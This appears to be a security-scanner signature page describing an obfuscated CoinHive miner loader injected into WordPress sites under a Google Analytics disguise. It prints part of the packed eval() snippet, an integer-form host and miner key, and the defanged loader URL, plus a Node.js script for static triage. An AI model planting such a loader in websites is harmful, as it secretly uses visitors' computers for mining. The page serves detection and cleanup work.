Description:
Website contains an encrypted CoinHive JavaScript miner library, which usually means that it is used without the webmaster's consent.
eval(function(p,a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'.split('|'),0,{}))
This code injects a script from hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 that loads the CoinHive JavaScript miner disguised as Google Analytics.
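A way to triage a packed script like the one above without executing it, as an added example that is not part of the original signature: it reads the packer's keyword table, converts an all-digit URL host to its dotted-quad IPv4 form, and flags the disguise and miner words visible in the sample. The function names, the 32-character token heuristic and the sample string are assumptions of this example.

```javascript
// Added example (not from the original page): static triage of a p,a,c,k,e,r-packed script.
// Function names and heuristics are assumptions of this example.

// An all-digit URL host is a 32-bit integer IPv4 address; return its dotted-quad form.
// Values below 2^24 (e.g. the "5000" timer delay or "11" in the dictionary) are ignored.
function integerHostToIPv4(word) {
  if (!/^\d{8,10}$/.test(word)) return null;
  const n = Number(word);
  if (n < 0x1000000 || n > 0xffffffff) return null;
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join('.');
}

// Pull the keyword table that the packer passes as '...'.split('|').
function extractPackerWords(source) {
  const m = /'([^']*)'\s*\.split\('\|'\)/.exec(source);
  return m ? m[1].split('|').filter(Boolean) : [];
}

function triagePackedScript(source) {
  const words = extractPackerWords(source);
  const findings = [];
  for (const w of words) {
    const ip = integerHostToIPv4(w);
    if (ip) findings.push({ type: 'integer-host', value: w, ip });
    // Heuristic: 32-character alphanumeric token, the shape of the key in the page's sample.
    if (/^[A-Za-z0-9]{32}$/.test(w)) findings.push({ type: 'key-like-token', value: w });
  }
  // Dictionary words the page's sample uses for the disguise and the miner start-up.
  const lures = ['googleanalytics', 'jquery', 'Anonymous', 'start'].filter(x => words.includes(x));
  if (lures.length) findings.push({ type: 'lure-words', value: lures.join(',') });
  return findings;
}

// Constructed sample in the shape of the page's snippet; the 32-character token is a placeholder.
const PLACEHOLDER_KEY = 'X'.repeat(32);
const SAMPLE = "eval(function(p,a,c,k,e,r){/* unpacker body omitted */}('0 1',2,2," +
  "'document|5000|setTimeout|createElement|11|3104709642|lib|jquery|src|min|" +
  "googleanalytics|Anonymous|" + PLACEHOLDER_KEY + "|start|http|js'.split('|'),0,{}))";

console.log(triagePackedScript(SAMPLE));
```

Run it with Node.js over theme and plugin files; any `integer-host` finding in a site script is worth a manual look, since legitimate libraries are not loaded from integer-form addresses.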
More information:
Microsoft Malware Protection Center notice.
Fake jQuery and Google Analytics Hide Yet Another Cryptominer
This infection usually comes along with the cloudflare.solutions WordPress keylogger.
Affecting: Mostly WordPress sites
Mitigation: How to clean a hacked WordPress site